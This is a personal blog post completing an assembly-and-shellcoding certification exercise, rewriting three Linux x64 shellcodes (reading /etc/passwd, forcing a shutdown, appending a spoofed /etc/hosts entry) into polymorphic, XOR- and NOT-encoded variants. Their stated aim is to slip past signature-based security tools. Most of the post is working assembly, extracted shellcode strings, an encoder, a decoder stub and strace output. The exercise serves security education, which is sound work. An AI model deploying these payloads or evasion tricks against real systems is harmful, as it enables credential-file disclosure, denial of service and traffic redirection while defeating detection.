Codehead's Corner
Random ramblings on hacking, coding, fighting with infrastructure and general tech
Security Tube SLAE64 Course - Assessment 6 - Polymorphic Payloads
Posted: 24 Nov 2017 at 20:29 by Codehead

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the sixth assignment: take three x64 payloads from ShellStorm and create new, polymorphic versions with the same functionality.

While this sounds super cool, what we’re actually doing is simply changing the content of the shellcode to try to evade detection by basic security tools that use signature-based matching to recognise threats. The assignment also requires each new payload to be no larger than 150% of the original payload size.
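
The size limit is simple arithmetic. A minimal sketch, assuming the 150% limit is rounded down to whole bytes (the helper names are made up for illustration) and using the original sizes quoted in the three ShellStorm listings used in this post:

```python
def max_size(original_size):
    """Largest polymorphic payload allowed: 150% of the original, rounded down."""
    return original_size * 3 // 2


def within_budget(original_size, new_size):
    """True if the rewritten payload respects the assignment's size limit."""
    return new_size <= max_size(original_size)


# Original payload sizes in bytes, as stated in the ShellStorm listings.
for name, original in [("passwd dump", 82), ("shutdown", 65), ("add host", 110)]:
    print(name, "limit:", max_size(original), "bytes")
```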

Dump Password Payload

As most of the previous assignments have focused on network operations, I chose the first shellcode sample because it used file I/O.

The starting point is Mr.Un1k0d3r’s Read /etc/passwd payload which is 82 bytes in size:

BITS 64
; Author Mr.Un1k0d3r - RingZer0 Team
; Read /etc/passwd Linux x86_64 Shellcode
; Shellcode size 82 bytes
global _start

section .text

_start:
jmp _push_filename
  
_readfile:
; syscall open file
pop rdi ; pop path value
; NULL byte fix
xor byte [rdi + 11], 0x41
  
xor rax, rax
add al, 2
xor rsi, rsi ; set O_RDONLY flag
syscall
  
; syscall read file
sub sp, 0xfff
lea rsi, [rsp]
mov rdi, rax
xor rdx, rdx
mov dx, 0xfff; size to read
xor rax, rax
syscall
  
; syscall write to stdout
xor rdi, rdi
add dil, 1 ; set stdout fd = 1
mov rdx, rax
xor rax, rax
add al, 1
syscall
  
; syscall exit
xor rax, rax
add al, 60
syscall
  
_push_filename:
call _readfile
path: db "/etc/passwdA"

The original code uses the jump, call, pop method to locate the address of the ‘/etc/passwd’ string at the end of the payload. We can mutate this by converting the string into hex values and pushing them onto the stack. Because x86 is little-endian and the stack grows downwards, this involves reversing the string and pushing it in 8 byte chunks, last chunk first. Note that we can’t use a NULL terminator on the string, so we’ll use a value of 0x1 and fix it afterwards.

push 0x01647773             ; 0x01 + dws
mov rbx, 0x7361702f6374652f ; sap/cte/
push rbx
mov rdi, rsp                ; Get address of path string
dec byte [rdi+11]           ; NULL byte fix

This change saves 2 bytes and transforms the raw strings visible in the shellcode.
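
The push values do not have to be worked out by hand. A rough Python 3 sketch (the function name `push_values` is my own, not part of the course material) that splits the path into 8 byte chunks and prints each chunk as the little-endian value to push, last chunk first:

```python
def push_values(path, chunk=8):
    """Split a byte string into stack-sized chunks and return each one as the
    little-endian integer to PUSH, last chunk first."""
    chunks = [path[i:i + chunk] for i in range(0, len(path), chunk)]
    return [int.from_bytes(c, "little") for c in reversed(chunks)]


# 0x01 stands in for the NULL terminator and is fixed at run time with DEC.
for value in push_values(b"/etc/passwd\x01"):
    print(hex(value))
```

The second value is too wide for a PUSH immediate, which is why the listing loads it into RBX first.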

The remainder of the first section sets the parameters for the SYS_OPEN syscall. We can modify these and save another 2 bytes:

push 2
sub rsi, rsi           ; set O_RDONLY flag
pop rax
syscall

The next section of the payload uses SYS_READ to read the content of the file into a buffer of 0xfff (4095 decimal) bytes which is allocated on the stack. There isn’t much to work with here, but we can optimise the parameter shuffling by reusing registers that are already known to be zero instead of XORing, and use a subtract operation to hide the 0xfff value.

push rax        ; Save file handle
xchg rsi, rax   ; Zero out RAX
push rax
pop rdx
pop rdi
sub dx, 0xf001
sub rsp, rdx    ; Make room on the stack
lea rsi, [rsp]  ; Pass the buffer address
syscall

These changes save a further 4 bytes.
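
The subtraction trick relies on 16 bit wraparound in DX. A small Python sketch of the arithmetic, assuming DX is zero beforehand as it is in the listing:

```python
def sub16(a, b):
    """16 bit subtraction with wraparound, as performed on the DX register."""
    return (a - b) & 0xFFFF


size = sub16(0, 0xF001)   # sub dx, 0xf001 with DX = 0
print(hex(size), size)
```

So the 0xfff literal never appears in the shellcode, yet RDX still ends up holding the buffer size.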

The third section uses SYS_WRITE to dump the data from the stack buffer to STDOUT. Again, there isn’t much to work with, but by optimising the parameters we can save 8 bytes:

push 1
pop rdx
xchg rax, rdx   ; syscall id and read size
push rax
pop rdi         ; fd id
syscall

The last section is a simple SYS_EXIT; all we can do here is try to save some bytes:

push 60
pop rax
syscall

Putting the whole thing together gives us pw_dump.nasm:

push 0x01647773
mov rbx, 0x7361702f6374652f
push rbx
mov rdi, rsp      ; Get addr of path string
dec byte [rdi+11] ; NULL byte fix
push 2
sub rsi, rsi      ; set O_RDONLY flag
pop rax
syscall           ; sys_open

push rax          ; Save file handle
xchg rsi, rax     ; Zero out RAX
push rax
pop rdx
pop rdi           ; File ID
sub dx, 0xf001
sub rsp, rdx      ; Make room on the stack
lea rsi, [rsp]    ; Pass the buffer address
syscall           ; sys_read

push 1
pop rdx
xchg rax, rdx     ; syscall id and read size
push rax
pop rdi           ; STDOUT (1)
syscall           ; sys_write

push 60 
pop rax
syscall           ; sys_exit

Extracting the payload results in a 64 byte shellcode string; a saving of 18 bytes:

"\x68\x73\x77\x64\x01\x48\xbb\x2f\x65\x74\x63\x2f"
"\x70\x61\x73\x53\x48\x89\xe7\xfe\x4f\x0b\x6a\x02"
"\x48\x29\xf6\x58\x0f\x05\x50\x48\x96\x50\x5a\x5f"
"\x66\x81\xea\x01\xf0\x48\x29\xd4\x48\x8d\x34\x24"
"\x0f\x05\x6a\x01\x5a\x48\x92\x50\x5f\x0f\x05\x6a"
"\x3c\x58\x0f\x05"

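As a sanity check on the extracted string, a short Python 3 sketch can confirm the length and the absence of NULL bytes. It also shows that the full path no longer appears as one contiguous string, although the 8 byte fragment inside the MOV immediate is still readable:

```python
shellcode = (
    b"\x68\x73\x77\x64\x01\x48\xbb\x2f\x65\x74\x63\x2f"
    b"\x70\x61\x73\x53\x48\x89\xe7\xfe\x4f\x0b\x6a\x02"
    b"\x48\x29\xf6\x58\x0f\x05\x50\x48\x96\x50\x5a\x5f"
    b"\x66\x81\xea\x01\xf0\x48\x29\xd4\x48\x8d\x34\x24"
    b"\x0f\x05\x6a\x01\x5a\x48\x92\x50\x5f\x0f\x05\x6a"
    b"\x3c\x58\x0f\x05"
)

print("length:", len(shellcode))
print("contains NULL:", b"\x00" in shellcode)
print("contains full path:", b"/etc/passwd" in shellcode)
print("contains fragment:", b"/etc/pas" in shellcode)
```
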
Shutdown

The next shellcode sample to be tackled is shutdown -h now by Osanda Malith Jayathissa which is a 65 byte payload.

; Title: shutdown -h now x86_64 Shellcode - 65 bytes
; Platform: linux/x86_64
; Date: 2014-06-27
; Author: Osanda Malith Jayathissa (@OsandaMalith)

section .text

global _start

_start:

xor rax, rax
xor rdx, rdx 

push rax

push byte 0x77
push word 0x6f6e ; now
mov rbx, rsp

push rax
push word 0x682d ;-h
mov rcx, rsp

push rax
mov r8, 0x2f2f2f6e6962732f ; /sbin/shutdown
mov r10, 0x6e776f6474756873
push r10
push r8
mov rdi, rsp

push rdx
push rbx
push rcx
push rdi
mov rsi, rsp

add rax, 59
syscall

There is another version of this code from another SLAE student on the ShellStorm site which is 1 byte smaller and uses some payload encoding. I decided to start with the original and see what I could do.

The code is an execve call to the system’s shutdown command. At the start the RAX and RDX registers are cleared. Looking through the code, RDX isn’t used until the end, where it becomes a syscall parameter, while RAX is only used to push zeros onto the stack until it is loaded with the syscall number at the end. This seems wasteful, so we’ll just clear RDX, use it for the zero pushes and worry about RAX later.

_start:
xor rdx, rdx
push rdx

The first PUSH adds a NULL to terminate the argument array which will be built in the next steps.

The next three sections push the argument strings onto the stack. As we’re working through the argument array in reverse, the ‘now’ string is the first item.

The original code pushes hexadecimal values to build the strings. I decided to use NOT inverted strings throughout the code to hide the content. This conceals the string values in the raw shellcode and gets around the NULL byte problem at the same time. However, pushing and NOTing the strings one at a time bloated the shellcode up to about 82 bytes.

...

push dword 0xffffffffff889091  ; inverse of 'now\x00'
not qword [rsp]
push rsp
pop rbx

...
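
To see why this fragment works, here is a Python sketch of what the CPU does with the value, assuming the usual behaviour of PUSH with a 32 bit immediate (sign extension to 64 bits) followed by a 64 bit NOT:

```python
MASK64 = (1 << 64) - 1


def sign_extend32(value):
    """Sign-extend a 32 bit immediate to 64 bits, as PUSH imm32 does."""
    value &= 0xFFFFFFFF
    if value & 0x80000000:
        value |= 0xFFFFFFFF00000000
    return value


pushed = sign_extend32(0xFF889091)   # what lands on the stack
decoded = ~pushed & MASK64           # not qword [rsp]
print(hex(pushed), decoded.to_bytes(8, "little"))
```

The sign extension fills the upper bytes with 0xff, which the NOT turns into the NULL padding that terminates the string.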

A second attempt at pushing the inverted strings and running a NOT loop over the stack afterwards got the code down to 76 bytes, but this was still not good enough. Some restructuring is required.

First, we define our inverted strings as data bytes and get the address using the jump, call, pop method:

  jmp _str ; Get addr of strings in RAX
_build:
  pop rax  

  ...

_str:
  call _build
_now: db 0x91, 0x90, 0x88, 0xff
_h:   db 0xd2, 0x97, 0xff
_cmd: db 0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff
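
The data bytes can be generated rather than typed in. A minimal Python 3 sketch (the helper name `invert` is mine) that inverts each NULL-terminated string and reports its offset within the block and the total length:

```python
def invert(data):
    """Bitwise NOT of every byte."""
    return bytes(b ^ 0xFF for b in data)


strings = [b"now", b"-h", b"/sbin/shutdown"]
blob = b""
offsets = []
for s in strings:
    encoded = invert(s + b"\x00")        # the terminator becomes 0xff
    offsets.append(len(blob))
    print(len(blob), ", ".join(f"0x{b:02x}" for b in encoded))
    blob += encoded
print("total bytes:", len(blob))
```

The offsets and the total length are the numbers the rest of the code depends on when it computes string addresses and sets the decode loop counter.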

With the start address of the data in RAX, we can build the argument array on the stack and store its address in RSI ready for the execve syscall:

push rax           ; 'now'
lea rdi, [rax+4]   ; '-h'
push rdi
lea rdi, [rax+7]   ; '/sbin/shutdown'
push rdi
push rsp           ; Save arg array addr
pop rsi

Using RDI for the effective address calculations also means that the command string for the syscall is populated at this point.
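
The push order can look backwards at first. This toy Python model of the stack, using a made-up base address of 0x1000 for the string data, shows how the pushes end up as a correctly ordered, NULL-terminated argument array when read upwards from RSP:

```python
BASE = 0x1000  # hypothetical address of the string data (the value in RAX)
memory = {BASE: "now", BASE + 4: "-h", BASE + 7: "/sbin/shutdown"}

stack = []  # index 0 is the top of the stack (lowest address)


def push(value):
    stack.insert(0, value)


push(0)          # push rdx: NULL terminator, done at the very start
push(BASE)       # push rax: 'now'
push(BASE + 4)   # push rdi: '-h'
push(BASE + 7)   # push rdi: '/sbin/shutdown'

# RSI = RSP: read pointers upwards from the top of the stack until the NULL.
argv = []
for pointer in stack:
    if pointer == 0:
        break
    argv.append(memory[pointer])
print(argv)
```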

The strings are still mangled, but we can run the NOT loop over the original data location using the value in RAX:

push 0x16
pop rcx
_decode:
not byte [rax]
inc rax
loop _decode
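
The loop is easy to model in Python to check that a count of 0x16 covers every data byte. This is only a simulation of the three instructions, with RAX treated as an index into the data rather than a real address:

```python
data = bytearray([
    0x91, 0x90, 0x88, 0xff,                          # 'now'
    0xd2, 0x97, 0xff,                                # '-h'
    0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97,  # '/sbin/shutdown'
    0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff,
])

rax, rcx = 0, 0x16
while rcx:               # loop _decode: decrement RCX, repeat until zero
    data[rax] ^= 0xFF    # not byte [rax]
    rax += 1             # inc rax
    rcx -= 1

print(bytes(data))
```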

Now RDI and RSI point to decoded strings, RDX was cleared at the start, all that remains is to trigger the syscall:

push 0x3b
pop rax
syscall

The complete listing of shutdown.nasm is pretty compact:

global _start
section .TEXT exec write

_start:
  xor rdx, rdx
  push rdx ; NULL to terminate arg array

  jmp _str ; Get addr of strings in RAX
_build:
  pop rax  

; Load string addresses onto stack
  push rax           ; 'now'
  lea rdi, [rax+4]   ; '-h'
  push rdi
  lea rdi, [rax+7]   ; '/sbin/shutdown'
  push rdi
  push rsp           ; Save arg array addr
  pop rsi

; Decode strings
  push 0x16
  pop rcx
_decode:
  not byte [rax]
  inc rax
  loop _decode

  push 0x3b
  pop rax
  syscall

_str:
  call _build
_now: db 0x91, 0x90, 0x88, 0xff
_h:   db 0xd2, 0x97, 0xff
_cmd: db 0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff

Extracting the shellcode results in a 62 byte string, just squeezing under the original and alternative implementations:

"\x48\x31\xd2\x52\xeb\x1d\x58\x50\x48\x8d\x78"
"\x04\x57\x48\x8d\x78\x07\x57\x54\x5e\x6a\x16"
"\x59\xf6\x10\x48\xff\xc0\xe2\xf9\x6a\x3b\x58"
"\x0f\x05\xe8\xde\xff\xff\xff\x91\x90\x88\xff"
"\xd2\x97\xff\xd0\x8c\x9d\x96\x91\xd0\x8c\x97"
"\x8a\x8b\x9b\x90\x88\x91\xff"; 

Add Host Mapping

For the last payload I decided to try another file-based example: Add map in /etc/hosts file, also by Osanda Malith Jayathissa. This is a 110 byte payload that adds a spoof mapping to the /etc/hosts file, allowing redirection of network traffic.

; Title: Add map in /etc/hosts file - 110 bytes
; Date: 2014-10-29
; Platform: linux/x86_64
; Website: http://osandamalith.wordpress.com
; Author: Osanda Malith Jayathissa (@OsandaMalith)

global _start
    section .text

_start:
    ;open
    xor rax, rax 
    add rax, 2  ; open syscall
    xor rdi, rdi
    xor rsi, rsi
    push rsi ; 0x00 
    mov r8, 0x2f2f2f2f6374652f ; stsoh/
    mov r10, 0x7374736f682f2f2f ; /cte/
    push r10
    push r8
    add rdi, rsp
    xor rsi, rsi
    add si, 0x401
    syscall

    ;write
    xchg rax, rdi
    xor rax, rax
    add rax, 1 ; syscall for write
    jmp data

write:
    pop rsi 
    mov dl, 19 ; length in rdx
    syscall

    ;close
    xor rax, rax
    add rax, 3
    syscall

    ;exit
    xor rax, rax
    mov al, 60
    xor rdi, rdi
    syscall 

data:
    call write
    text db '127.1.1.1 google.lk'

For this exercise I decided to use a different method of string referencing. A CALL instruction can be used to jump over an inline string while helpfully placing the string’s address on the stack. Unfortunately, a near CALL in 64 bit mode always carries a 4 byte relative displacement, so a short forward call introduces zeros into the shellcode. This is normally handled by jumping backwards, which makes the displacement negative, but in this example we’ll try something else.

In the first section where we call the SYS_OPEN syscall, the path string can be incorporated into the code with a CALL. This really helps reduce the size of the final shellcode:

; open
  xor rsi, rsi
  add si, 0x401  ; write-only and append flags
  call _jump1
  db '/etc/hosts', 0x00
_jump1:
  pop rdi        ; path reference
  push 2
  pop rax       
  syscall

However, the disassembly shows the zeros introduced by the CALL instruction:

0000000000600078 <_start>:
  600078: 48 31 f6              xor    rsi,rsi
  60007b: 66 81 c6 01 04        add    si,0x401
  600080: e8 0b 00 00 00        call   600090 <_jump1>
  600085: 2f 65 74 63 ...       (bad)  
  ...

0000000000600090 <_jump1>:
  600090: 5f                    pop    rdi
  600091: 6a 02                 push   0x2
  600093: 58                    pop    rax
  600094: 0f 05                 syscall 
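
The difference between forward and backward calls comes down to how the 32 bit displacement is encoded. A Python sketch using `struct` to build the E8 instruction bytes; the forward addresses come from the disassembly above, while the backward offsets (35 and 6) are my own hand count of where `call _build` and `_build` sit in the shutdown shellcode, so treat them as an assumption:

```python
import struct


def call_bytes(call_addr, target_addr):
    """Encode a near CALL (opcode E8 + rel32) located at call_addr."""
    displacement = target_addr - (call_addr + 5)   # relative to the next instruction
    return b"\xe8" + struct.pack("<i", displacement)


forward = call_bytes(0x600080, 0x600090)   # call _jump1
backward = call_bytes(35, 6)               # call _build in the shutdown payload
print(forward.hex(), backward.hex())
```

A small positive displacement pads with 0x00, a small negative one pads with 0xff.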

To solve this and obscure the string contents, we will encode the entire payload and write a small decoder header.

The remainder of the code is quite straightforward and we can make some quick optimisations to bring the size down.

The final pre-encoding version is addhost_pre_encode.nasm:

_start:
; open
  xor rsi, rsi
  add si, 0x401  ; write-only and append flags
  call _jump1
  db '/etc/hosts', 0x00
_jump1:
  pop rdi        ; path reference
  push 2
  pop rax       
  syscall

; write
  xchg rax, rdi
  push 1
  pop rax        ; syscall for write
  call _jump2
  db '127.1.1.1 google.lk', 0xa
_jump2:
  pop rsi 
  push 20        ; data length in rdx
  pop rdx 
  syscall

;close
  push 3
  pop rax
  syscall

;exit
  push 60
  pop rax
  syscall 

The optimisations have squeezed the code down to 76 bytes, leaving 34 bytes for the decoder stub if we want to stay under the original 110 bytes.

A simple one byte XOR encoding of the shellcode requires a few lines of Python:

MBP:slae64$ python
Python 2.7.3 (default, Oct 26 2016, 21:01:49) 
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> payload = [0x48,0x31,0xf6,0x66,0x81,0xc6,0x01,0x04,0xe8,0x0b,0x00,0x00,0x00,0x2f,0x65, ...
>>> for b in payload:
...     sys.stdout.write(hex(b ^ 0x41) + ',')
... 
0x9,0x70,0xb7,0x27,0xc0,0x87,0x40,0x45,0xa9,0x4a,0x41,0x41,0x41,0x6e,0x24,0x35,0x22,0x6e,0x29,
0x2e,0x32,0x35,0x32,0x41,0x1e,0x2b,0x43,0x19,0x4e,0x44,0x9,0xd6,0x2b,0x40,0x19,0xa9,0x55,0x41,
0x41,0x41,0x70,0x73,0x76,0x6f,0x70,0x6f,0x70,0x6f,0x70,0x61,0x26,0x2e,0x2e,0x26,0x2d,0x24,0x6f,
0x2d,0x2a,0x4b,0x1f,0x2b,0x55,0x1b,0x4e,0x44,0x2b,0x42,0x19,0x4e,0x44,0x2b,0x7d,0x19,0x4e,0x44,
>>>
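
For anyone on Python 3, the same encoder can be sketched as a pair of small functions (the names `xor_encode` and `as_db` are my own). Only the 15 payload bytes visible in the session above are used here, since the rest of the list is elided:

```python
def xor_encode(data, key):
    """XOR every byte with a one byte key; applying it twice restores the input."""
    return bytes(b ^ key for b in data)


def as_db(data, per_line=10):
    """Format bytes as NASM db lines."""
    lines = []
    for i in range(0, len(data), per_line):
        row = ",".join(f"0x{b:02x}" for b in data[i:i + per_line])
        lines.append("db " + row)
    return "\n".join(lines)


# First 15 bytes of the payload, as shown in the session above.
prefix = bytes([0x48, 0x31, 0xf6, 0x66, 0x81, 0xc6, 0x01, 0x04,
                0xe8, 0x0b, 0x00, 0x00, 0x00, 0x2f, 0x65])
encoded = xor_encode(prefix, 0x41)
print(as_db(encoded))
```

Any byte equal to the key would encode to zero, so the key has to be a value that never occurs in the payload.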

The decoder header uses a jump, call and pop to get the address of the payload, then a simple bytewise XOR loop to decode the data.

_start:
jmp _code_marker ; Get the payload address
_decode:
pop rax

push 76      ; Decode
pop rcx
_decode_loop:
xor byte [rax], 0x41
inc rax
loop _decode_loop

jmp _payload     ; Jump to decoded payload

_code_marker:
call _decode
_payload:
db 0x09,0x70,0xb7,0x27,0xc0,0x87,0x40,0x45,0xa9,0x4a
db 0x41,0x41,0x41,0x6e,0x24,0x35,0x22,0x6e,0x29,0x2e
db 0x32,0x35,0x32,0x41,0x1e,0x2b,0x43,0x19,0x4e,0x44
db 0x09,0xd6,0x2b,0x40,0x19,0xa9,0x55,0x41,0x41,0x41
db 0x70,0x73,0x76,0x6f,0x70,0x6f,0x70,0x6f,0x70,0x61
db 0x26,0x2e,0x2e,0x26,0x2d,0x24,0x6f,0x2d,0x2a,0x4b
db 0x1f,0x2b,0x55,0x1b,0x4e,0x44,0x2b,0x42,0x19,0x4e
db 0x44,0x2b,0x7d,0x19,0x4e,0x44
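
A quick Python 3 check of the encoded block shows what the encoding buys us. The bytes below are copied from the db lines above; decoding them offline with the same key reveals the NULL bytes and readable strings that the encoded form hides:

```python
encoded = bytes([
    0x09, 0x70, 0xb7, 0x27, 0xc0, 0x87, 0x40, 0x45, 0xa9, 0x4a,
    0x41, 0x41, 0x41, 0x6e, 0x24, 0x35, 0x22, 0x6e, 0x29, 0x2e,
    0x32, 0x35, 0x32, 0x41, 0x1e, 0x2b, 0x43, 0x19, 0x4e, 0x44,
    0x09, 0xd6, 0x2b, 0x40, 0x19, 0xa9, 0x55, 0x41, 0x41, 0x41,
    0x70, 0x73, 0x76, 0x6f, 0x70, 0x6f, 0x70, 0x6f, 0x70, 0x61,
    0x26, 0x2e, 0x2e, 0x26, 0x2d, 0x24, 0x6f, 0x2d, 0x2a, 0x4b,
    0x1f, 0x2b, 0x55, 0x1b, 0x4e, 0x44, 0x2b, 0x42, 0x19, 0x4e,
    0x44, 0x2b, 0x7d, 0x19, 0x4e, 0x44,
])

decoded = bytes(b ^ 0x41 for b in encoded)   # same operation as the decode loop

print("length:", len(encoded))
print("NULLs before/after decoding:", encoded.count(0), decoded.count(0))
print("path visible before/after:", b"/etc/hosts" in encoded, b"/etc/hosts" in decoded)
```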

There is a little bit of faff with labels on the payload: after the decode loop completes we must jump over the call _decode instruction to the _payload marker, or we will get stuck in an endless decoder loop. Fortunately, labels don’t add to the size of the shellcode and short jumps are only two bytes.

This completes the addhost.nasm code. The final size of the shellcode is 97 bytes, well under the original 110, even with added content obfuscation.

We can test the operation of the shellcode using strace to confirm the syscalls:

MBP:slae64$ strace ./addhost
execve("./addhost", ["./addhost"], [/* 23 vars */]) = 0
open("/etc/hosts", O_WRONLY|O_APPEND)   = 3
write(3, "127.1.1.1 google.lk\n", 20)   = 20
close(3)                                = 0
_exit(3)                                = ?
MBP:slae64$ 
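
The flags strace reports can be reproduced from the 0x401 value loaded into SI. A small Python sketch, with the Linux x86-64 flag values from fcntl.h written out explicitly so it does not depend on the host platform (the `describe` helper is just for illustration and only knows about the flags used here):

```python
# Linux x86-64 open(2) flag values, written in octal as in <fcntl.h>.
O_RDONLY = 0o0
O_WRONLY = 0o1
O_RDWR = 0o2
O_APPEND = 0o2000


def describe(flags):
    """Name the access mode and the O_APPEND bit of an open() flags value."""
    access = {O_RDONLY: "O_RDONLY", O_WRONLY: "O_WRONLY", O_RDWR: "O_RDWR"}
    names = [access[flags & 0o3]]
    if flags & O_APPEND:
        names.append("O_APPEND")
    return "|".join(names)


print(describe(0x401))
```

The final _exit(3) in the trace is not an error either: RDI still holds the file descriptor from the earlier calls when SYS_EXIT is invoked.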

Conclusion

I have deliberately tried to select some different payloads in this assignment and I have used different techniques to add some variety to the results. This has been very useful in allowing me to experiment with some of the optimisations and tricks I have seen while studying the SLAE64 course.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: SLAE64-1471


